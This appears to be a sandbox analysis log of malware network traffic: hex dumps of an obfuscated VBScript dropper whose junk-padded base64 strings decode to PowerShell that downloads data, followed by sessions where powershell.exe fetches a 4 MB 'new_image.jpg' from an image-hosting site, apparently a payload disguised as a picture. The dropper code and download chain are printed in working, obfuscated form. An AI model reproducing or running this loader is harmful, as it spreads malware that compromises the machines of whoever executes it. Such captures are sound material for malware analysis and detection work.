                                Data Ascii: formalizar = "" & bespa & desmanivar & bespa & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTre
                                2024-05-28 07:30:13 UTC1369INData Raw: 72 65 51 77 42 76 44 67 54 72 65 48 55 44 67 54 72 65 62 67 42 30 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 4d 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 22 20 26 20 62 65 73 70 61 20 26 20 64 65 73 6d 61 6e 69 76 61 72 20 26 20 62 65 73 70 61 20 26 20 22 67 42 76 44 67 54 72 65 48 49 44 67 54 72 65 22 20 26 20 62 65 73 70 61 20 26 20 64 65 73 6d 61 6e 69 76 61 72 20 26 20 62 65 73 70 61 20 26 20 22 51 42 68 44 67 54 72 65 47 4d 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 67 44 67 54 72
                                Data Ascii: reQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & bespa & desmanivar & bespa & "gBvDgTreHIDgTre" & bespa & desmanivar & bespa & "QBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTr
                                2024-05-28 07:30:13 UTC1369INData Raw: 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 62 65 73 70 61 20 26 20 64 65 73 6d 61 6e 69 76 61 72 20 26 20 62 65 73 70 61 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 62 65 73 70 61 20 26 20 64 65 73 6d 61 6e 69 76 61 72 20 26 20 62 65 73 70 61 20 26 20 22 51 42 75 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 6a 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 75 44 67 54 72 65 47 49 44 67 54 72 65 63 67 44 67 54 72 65 76 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 62 65 73 70 61 20 26 20 64 65 73 6d 61 6e 69 76 61 72 20 26 20 62 65 73 70 61 20 26 20 22 51 42 7a 44 67 54 72 65
                                Data Ascii: GwDgTrebwBhDgTreGQDgTre" & bespa & desmanivar & bespa & "DgTreBlDgTreGkDgTrebQBhDgTreGcDgTre" & bespa & desmanivar & bespa & "QBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTre" & bespa & desmanivar & bespa & "QBzDgTre
                                2024-05-28 07:30:13 UTC1369INData Raw: 62 65 73 70 61 20 26 20 64 65 73 6d 61 6e 69 76 61 72 20 26 20 62 65 73 70 61 20 26 20 22 51 42 43 44 67 54 72 65 48 6b 44 67 54 72 65 64 44 67 54 72 65 42 6c 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 77 44 67 54 72 65 61 51 42 75 44 67 54 72 65 47 73 44 67 54 72 65 63 77 44 67 54 72
                                Data Ascii: bespa & desmanivar & bespa & "QBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTr
                                2024-05-28 07:30:13 UTC1369INData Raw: 67 54 72 65 22 20 26 20 62 65 73 70 61 20 26 20 64 65 73 6d 61 6e 69 76 61 72 20 26 20 62 65 73 70 61 20 26 20 22 77 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6e 44 67 54 72 65 44 77 44 67 54 72 65 50 44 67 54 72 65 42 43 44 67 54 72 65 45 45 44 67 54 72 65 55 77 42 46 44 67 54 72 65 44 59 44 67 54 72 65 4e 44 67 54 72 65 42 66 44 67 54 72 65 45 55 44 67 54 72 65 54 67 42 45 44 67 54 72 65 44 34 44 67 54 72 65 50 67 44 67 54 72 65 6e 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 64 44 67 54 72 65 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 62 65 73 70 61 20 26 20 64 65 73 6d 61 6e
                                Data Ascii: gTre" & bespa & desmanivar & bespa & "wDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTre" & bespa & desman
                                2024-05-28 07:30:13 UTC1099INData Raw: 67 54 72 65 4c 51 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 64 44 67 54 72 65 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 62 65 73 70 61 20 26 20 64 65 73 6d 61 6e 69 76 61 72 20 26 20 62 65 73 70 61 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 4b 51 44 67 54 72 65 67 44 67 54 72 65 48 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 64 44 67 54 72 65 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 62 65 73 70 61 20 26 20 64 65 73 6d 61 6e 69 76 61 72 20 26 20 62 65 73 70 61 20 26 20 22
                                Data Ascii: gTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTre" & bespa & desmanivar & bespa & "DgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTre" & bespa & desmanivar & bespa & "
                                2024-05-28 07:30:13 UTC1369INData Raw: 31 33 32 64 0d 0a 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 79 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 62 65 73 70 61 20 26 20 64 65 73 6d 61 6e 69 76 61 72 20 26 20 62 65 73 70 61 20 26 20 22 51 42 34 44 67 54 72 65 43 77 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 49 44 67 54 72 65 59 51 42 7a 44 67 54 72 65 47 55 44 67 54 72 65 4e 67 44 67 54 72 65 30 44 67 54 72 65 45 77 44 67 54 72 65 22 20 26 20 62 65 73 70 61 20 26 20 64 65 73 6d 61 6e 69 76 61 72 20 26 20 62 65 73 70 61 20 26 20 22 51 42 75 44 67 54 72 65 47 63 44
                                Data Ascii: 132dHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" & bespa & desmanivar & bespa & "QB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTre" & bespa & desmanivar & bespa & "QBuDgTreGcD
                                2024-05-28 07:30:13 UTC1369INData Raw: 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 47 55 44 67 54 72 65 22 20 26 20 62 65 73 70 61 20 26 20 64 65 73 6d 61 6e 69 76 61 72 20 26 20 62 65 73 70 61 20 26 20 22 44 67 54 72 65 42 42 44 67 54 72 65 48 4d 44 67 54 72 65 63 77 42 6c 44 67 54 72 65 47 30 44 67 54 72 65 59 67 42 73 44 67 54 72 65 48 6b 44 67 54 72 65 4c 67 42 48 44 67 54 72 65 47 55 44 67 54 72 65 64 44 67 54 72 65 42 55 44 67 54 72 65 48 6b 44 67 54 72 65 63 44 67 54 72 65 42 6c 44 67 54 72 65 43 67 44 67 54 72 65 4a 77 42 51 44 67 54 72 65 46 49 44 67 54 72 65 54 77 42 4b 44 67 54 72 65 45 55 44 67 54 72 65 56 44 67 54 72 65 42 50 44 67 54 72 65
                                Data Ascii: DgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTre" & bespa & desmanivar & bespa & "DgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTre
                                2024-05-28 07:30:13 UTC1369INData Raw: 7a 44 67 54 72 65 47 45 44 67 54 72 65 64 44 67 54 72 65 42 70 44 67 54 72 65 48 59 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 47 38 44 67 54 72 65 4a 77 44 67 54 72 65 73 44 67 54 72 65 43 63 44 67 54 72 65 55 67 42 6c 44 67 54 72 65 47 63 44 67 54 72 65 51 51 42 7a 44 67 54 72 65 47 30 44 67 54 72 65 4a 77 44 67 54 72 65 73 44 67 54 72 65 43 63 44 67 54 72 65 4a 77 44 67 54 72 65 70 44 67 54 72 65 43 6b 44 67 54 72 65 66 51 44 67 54 72 65 67 44 67 54 72 65 48 30 44 67 54 72 65 22 0d 0a 20 20 20 20 20 66 6f 72 6d 61 6c 69 7a 61 72 20 3d 20 52 65 70 6c 61 63 65 28 20 66 6f 72 6d 61 6c 69 7a 61 72 2c 20 62 65 73 70 61 20 2b 20 64 65 73 6d 61 6e 69 76 61 72 20 2b 20 62 65 73 70 61 20 2c 20 22 5a 22 29 0d 0a 20 20 20 20 20 53 65 74 20 43 61 6d 61 20 3d 20 57
                                Data Ascii: zDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre" formalizar = Replace( formalizar, bespa + desmanivar + bespa , "Z") Set Cama = W


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.2249175188.114.97.34433404C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-05-28 07:30:17 UTC124OUTGET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1
                                Host: uploaddeimagens.com.br
                                Connection: Keep-Alive
                                2024-05-28 07:30:17 UTC697INHTTP/1.1 200 OK
                                Date: Tue, 28 May 2024 07:30:17 GMT
                                Content-Type: image/jpeg
                                Content-Length: 4201093
                                Connection: close
                                Last-Modified: Tue, 21 May 2024 16:07:14 GMT
                                ETag: "664cc6b2-401a85"
                                Cache-Control: max-age=2678400
                                CF-Cache-Status: HIT
                                Age: 6417
                                Accept-Ranges: bytes
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yRR1CVtPNitSSLoiQV5gYHjjT6D9Dp6jSAEZODS9XdnCEzr8fh7xOzUmBS%2FF%2FAcdeNBvM66nUqmiu%2BVhoxEC%2BEohU86dK7OtxlpN0t7kZD65pwqa3TXO4xdZuuDbgEFIVKHcXpfZlkZS"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 88ac89da797b0fa0-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-28 07:30:17 UTC672INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                2024-05-28 07:30:17 UTC1369INData Raw: d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7
                                Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4Ap
                                2024-05-28 07:30:17 UTC1369INData Raw: 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08
                                Data Ascii: H%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$j
                                2024-05-28 07:30:17 UTC1369INData Raw: 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00
                                Data Ascii: mTr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(
                                2024-05-28 07:30:17 UTC1369INData Raw: f8 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c
                                Data Ascii: 2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^
                                2024-05-28 07:30:17 UTC1369INData Raw: 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b
                                Data Ascii: <RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>im
                                2024-05-28 07:30:17 UTC1369INData Raw: 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6
                                Data Ascii: T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},
                                2024-05-28 07:30:17 UTC1369INData Raw: db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53
                                Data Ascii: vu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSS
                                2024-05-28 07:30:17 UTC1369INData Raw: 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42
                                Data Ascii: _4/mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@B
                                2024-05-28 07:30:17 UTC1369INData Raw: 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21
                                Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS!


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.2249176188.114.97.34433404C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-05-28 07:30:21 UTC100OUTGET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1
                                Host: uploaddeimagens.com.br
                                2024-05-28 07:30:21 UTC699INHTTP/1.1 200 OK
                                Date: Tue, 28 May 2024 07:30:21 GMT
                                Content-Type: image/jpeg
                                Content-Length: 4201093
                                Connection: close
                                Last-Modified: Tue, 21 May 2024 16:07:14 GMT
                                ETag: "664cc6b2-401a85"
                                Cache-Control: max-age=2678400
                                CF-Cache-Status: HIT
                                Age: 6421
                                Accept-Ranges: bytes
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tbqUqD0TyWNkpsOp6UxB%2BCYzXwvUMMHYooxllLN0Z6XCAGhE8yncsFVyMj7gG8sbOmJrd%2BlWa%2FqxDTQmscKcJG%2B5Gm1RLCpW9vEO02QQxlkiKcpDs97oVztXyr6R%2BDkhgtRn9Buoyl8n"}],"group":"cf-nel","max_age":604800}
